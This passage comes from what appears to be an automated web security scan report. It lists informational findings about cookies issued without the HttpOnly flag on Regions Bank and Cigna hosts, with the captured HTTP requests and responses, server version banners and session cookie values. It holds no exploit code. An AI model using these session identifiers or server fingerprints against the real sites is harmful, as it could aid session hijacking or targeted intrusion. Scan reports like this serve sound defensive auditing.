User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 17051
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:01 GMT

function DcsInit() {
this.dcsid = "dcs4b71fc10000gs8u88h5t1k_6n2i";
this.domain = "statse.webtrendslive.com";
this.enabled = true;
this.exre = (function() {
if (window.Reg
...[SNIP]...
8.53. https://secureapps.regions.com/oao/styles/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/styles/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/styles/main.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 10689
Content-Type: text/css
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:57 GMT


img{border:none; padding:0px; margin:0px;}

body {background: #fff; font-family: Arial; color: #444; font-size: 1em; margin:0; padding: 0;}

A:link {color: #580; text-decoration: none;}
A:activ
...[SNIP]...
8.54. https://secureapps.regions.com/oao/styles/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/styles/thickbox.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/styles/thickbox.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 4016
Content-Type: text/css
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/* ----------------------------------------------------------------------------------------------------------------*/
/* ---------->>> global settings needed for thickbox <<<-------------------------
...[SNIP]...
8.55. https://securebank.regions.com/SystemUnavailable.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /SystemUnavailable.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SystemUnavailable.aspx?ResultCode=VALIDATIONERROR HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: securebank.regions.com-https=R890651000; ASP.NET_SessionId=rxyjhw55ndvthz45fybes045

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 4559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
   <HEAD>
       <title>Regions Online Banking</title>
       <link href="https://secureb
...[SNIP]...
8.56. https://securebank.regions.com/VAM/2_0_2/VAM.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAM.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAM/2_0_2/VAM.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 37697

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


var gVAM_UA = navigator.userAgent.toLowerCase();
var gVAM_OS, gV
...[SNIP]...
8.57. https://securebank.regions.com/VAM/2_0_2/VAML2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAML2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAM/2_0_2/VAML2.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 5007

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


function VAM_EvalDiffCond(pCO)
{
var vVal1 = pCO.ConvVal(pCO, p
...[SNIP]...
8.58. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAM_DTTB.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAM/2_0_2/VAM_DTTB.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 5948

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


function VAM_ReformatInit(pAO)
{
var vFld = VAM_GetById(pAO.Con
...[SNIP]...
8.59. https://securebank.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: no-cache
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Fri, 28 Sep 2007 03:41:18 GMT
Accept-Ranges: bytes
ETag: "e0921d6e811c81:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:22 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
8.60. https://securebank.regions.com/images/btnContinue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/btnContinue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btnContinue.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R929786393; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Length: 1026
Content-Type: image/gif
Last-Modified: Mon, 19 Feb 2007 12:52:50 GMT
Accept-Ranges: bytes
ETag: "03d9adc2454c71:f627"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:09 GMT

GIF89aF......U..U.....V....g9V.U..j.$U..7W.U..9V.V........S..U..W....ET..X..6V.u.59W.V..T..8X....:W....6X...V6X.9V.......7W.^..7Y.5W....8Y....W..W..S..U..T..7X.......S..T..7V.8U.R..T..6X.Q..T..8S....S
...[SNIP]...
8.61. https://securebank.regions.com/images/equalhousing.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/equalhousing.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/equalhousing.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 282
Content-Type: image/gif
Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT
Accept-Ranges: bytes
ETag: "0b7b64b4d9c61:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT

GIF89a...........//.........kjjTr.VUU......GGG.........+Gt>>=......EQf............. B...{...........&%#`n....!.......,............'.di."..,.e...%0...,.......P0*.......    E.1.%..D.$ ....blK.
...s.%.
.#..
...[SNIP]...
8.62. https://securebank.regions.com/images/green/rf_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/green/rf_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/green/rf_logo.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 4105
Content-Type: image/gif
Last-Modified: Wed, 13 Aug 2008 19:18:20 GMT
Accept-Ranges: bytes
ETag: "0e6a25879fdc81:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:05 GMT

GIF89a).8.......U..............U.................V.....W.......r....................}.....w........u......r..........A....>...i.............}_...................{.;...~.?......^....................
...[SNIP]...
8.63. https://securebank.regions.com/images/red_arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/red_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/red_arrow.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R929786393; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Length: 54
Content-Type: image/gif
Last-Modified: Wed, 14 Feb 2007 14:50:26 GMT
Accept-Ranges: bytes
ETag: "0a53d764750c71:f627"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:09 GMT

GIF89a........U....!.......,...........a.........p..;
8.64. https://securebank.regions.com/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 799
Content-Type: image/gif
Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT
Accept-Ranges: bytes
ETag: "0b7b64b4d9c61:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT

GIF89a..................................................................................................................................................................................................
...[SNIP]...
8.65. https://securebank.regions.com/script/regions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /script/regions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/regions.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Oct 2010 15:22:00 GMT
Accept-Ranges: bytes
ETag: "01c578a6a70cb1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:00 GMT
Content-Length: 8556

/**********************************************************
* *
* Copyright .2005 Corillian Corporation *
*
...[SNIP]...
8.66. https://securebank.regions.com/styles/styles.AmSouth.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /styles/styles.AmSouth.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/styles.AmSouth.css HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT
Accept-Ranges: bytes
ETag: "05c773bea85ca1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:00 GMT
Content-Length: 25437

BODY
{font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;}
.pageBackground
{background-image:url(../images/page_bck.gif);
...[SNIP]...
8.67. https://securebank.regions.com/styles/stylesprint.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /styles/stylesprint.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/stylesprint.css HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT
Accept-Ranges: bytes
ETag: "05c773bea85ca1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:01 GMT
Content-Length: 32493

BODY
{font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;}
.pageBackground
{background-image:url(../images/page_bck.gif);
...[SNIP]...
8.68. https://sso.corp.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=84D993307FD1107FC884A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:19 GMT
Content-length: 261
Content-type: text/html
Set-Cookie: TLTHID=8C93EE5E7FD1107FC96FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; Path=/; Domain=.cigna.com
Etag: "f2e32241-1-0-105"
Last-modified: Sun, 17 Jul 2005 20:01:07 GMT
Accept-ranges: bytes

<HTML>
<HEAD>
<META Http-Equiv="Cache-Control" Content="no-cache">
<META Http-Equiv="Pragma" Content="no-cache">
<META Http-Equiv="Expires" Content="0">
<META HTTP-EQUIV="Refresh" Content="0
...[SNIP]...
8.69. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/CIGNAforpros_logo1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/CIGNAforpros_logo1.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
